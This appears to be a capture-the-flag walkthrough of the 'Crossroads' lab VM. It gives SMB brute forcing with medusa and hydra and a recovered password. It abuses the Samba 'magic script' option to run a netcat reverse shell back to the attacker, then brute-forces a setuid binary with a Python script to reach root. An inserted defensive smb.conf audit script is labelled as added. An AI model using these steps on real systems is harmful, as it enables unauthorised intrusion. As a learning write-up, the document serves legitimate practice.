crossroads walk-through


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Medium

I had to copy a Python script from other people and it took me some time to troubleshoot.


You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0

From the ARP scan we get our target (victim) machine IP:

nmap -sC -sV -p- -Pn -o nmap.log

Output: (Information redacted)

# Nmap 7.91 scan initiated Sun May 30 08:10:34 2021 as: nmap -sC -sV -p- -Pn -o nmap.log
Nmap scan report for
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2021-05-29T21:40:49-05:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02:

I didn’t get anything useful through exiftool (metadata).

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x php,txt,html,bak -o gobuster.log

OK, based on the nmap result, we know the system is running SMB, so let’s do some enumeration.

Enumerate SMB Protocol

 nmap --script smb-vuln* -p 139,445 -o nmap.log
Starting Nmap 7.91 ( ) at 2021-05-30 08:30 IST
Nmap scan report for
137/tcp closed netbios-ns
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
enum4linux -A


User: albert

Let’s do a brute force and try our luck 😉

Brute Force Method 1: (working)

medusa -h -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt

ACCOUNT FOUND: [smbnt] Host: User: albert Password: bradley1 [SUCCESS (ADMIN$ – Share Unavailable)]


Brute Force Method 2: (not fixed yet.)

hydra -l albert -P /usr/share/wordlists/rockyou.txt smb

nmap -p445 --script smb-brute --script-args userdb=albert,passdb=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

nmap -p 135,139,445 --script smb-pwdump --script-args smbuser=USERNAME,smbpass=PASSWORD <Target>



smbclient // -U albert

Password: bradley1

Note: inside smbclient you can use get <filename> to download any of the files you want.

We got the first flag:

I got stuck here, so I need to figure out what to do with the information I have so far (if the information is not enough, I need to dig more, which means enumerate more).

I read the entire smb.conf and the only thing which I feel is fishy (or favorable to us) is this line:


path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script =
guest ok = no

To be honest, I am not sure what it is, so I had to google it. I got a perfect link. If you do not want to read the entire blog, the following lines are enough for us:

magic script

If the magic script option is set to a filename and the client creates a file by that name in that share, Samba will run the file as soon as the user has opened and closed it. For example, let’s assume that the following option was created in the share:

	magic script =

Samba continually monitors the files in that share. If one by the name of is closed (after being opened) by a user, Samba will execute the contents of that file locally. The file will be passed to the shell to execute; it must therefore be a legal Unix shell script. This means that it must have newline characters as line endings instead of Windows CR/LFs. In addition, it helps if you use the directive at the beginning of the file to indicate under which shell the script should run.
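As an added defensive check (not from the original post): a small Python audit that parses an smb.conf like the one above, flags every share that sets magic script and notes whether that share is writable, and also reports when [global] does not make SMB signing mandatory (the nmap output above showed message signing disabled). The sample config and the script filename are constructed placeholders.

```python
# Constructed sample modelled on the share block in the write-up (script name is a placeholder).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
[smbshare]
   path = /home/albert/smbshare
   writable = yes
   read only = no
   magic script = placeholder.sh
"""
YES = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Return {section: {parameter: value}}; names are normalised the way Samba does."""
    sections, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if not line or line[0] in "#;":          # Samba only honours whole-line comments
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def share_is_writable(params):
    """writable/writeable/write ok invert 'read only'; the last one wins, default is read-only."""
    read_only = True
    for key, value in params.items():
        if key == "read only":
            read_only = value.lower() in YES
        elif key in ("writable", "writeable", "write ok"):
            read_only = value.lower() not in YES
    return not read_only

def audit_smb_conf(text):
    """Return (section, finding) pairs: magic scripts per share, signing policy in [global]."""
    findings = []
    for name, params in parse_smb_conf(text).items():
        if name == "global":
            if params.get("server signing", "").lower() not in ("mandatory", "required"):
                findings.append((name, "server signing is not mandatory"))
            continue
        script = params.get("magic script", "")
        if script:
            kind = "writable" if share_is_writable(params) else "read-only"
            findings.append((name, f"magic script = {script} on {kind} share"))
    return findings
```

A magic script on a writable share means any user who can write to it can get code executed as themselves on the server, so that combination is the one to remediate first.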


So what I want to do now is to upload a reverse shell to /home/albert/smbshare, named as configured in magic script =

On Kali Linux, create the script with the following content:


nc -e /bin/sh 1234

On one Terminal type:

nc -lvp 1234

Let’s connect to the smbshare now (as soon as you put the script in the share, you will receive the reverse connection).

smbclient // -U albert

Password: bradley1


Post Exploitation

python3 -c "import pty;pty.spawn('/bin/bash')";

export TERM=xterm


I have uploaded the at /tmp on the victim machine.

-rwsr-xr-x 1 root root 17K Mar 2 17:02 /home/albert/beroot 
file beroot
beroot: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, BuildID[sha1]=c1da1f0fded1889d32e27b99a2a4bd170c30349b, for GNU/Linux 3.2.0, not stripped
xxd beroot

/bin/bash /root/

I can sense that this binary is performing the above command, but I am not sure what beroot is, so I did a Google search.


“BeRoot is a post exploitation tool to check common misconfigurations on Windows, Linux and Mac OS to find a way to escalate our privilege.”

./beroot   # asks password for the root

Yes, it is asking for the root password. Let’s upload rockyou.txt to the victim machine and brute-force the beroot binary.

source code: 1 2

import subprocess

# rockyou.txt contains bytes that are not valid UTF-8, hence the ISO-8859-1 encoding
with open('rockyou.txt', 'r', encoding='ISO-8859-1') as f:
    passList = f.read().splitlines()

for passwd in passList:
    # feed the candidate on stdin rather than interpolating it into a shell
    # command, so quotes or $ in a wordlist entry cannot break the pipeline
    result = subprocess.run(['./beroot'], input=passwd + '\n',
                            capture_output=True, encoding='ISO-8859-1')
    response = result.stdout + result.stderr
    if 'wrong password!!!' not in response:
        print('Password found: {}'.format(passwd))
        print("This is the output: \n{}".format(response))
        break

cat rootcreds

I tried to provide the password to ./beroot but it was not accepting it, so I thought why not try to switch to the root user with the password …

su - root



cat root.txt

I am going to buy vegetables now as the market is going to close soon (because of COVID). Anyway, I wish you a happy weekend 🙂





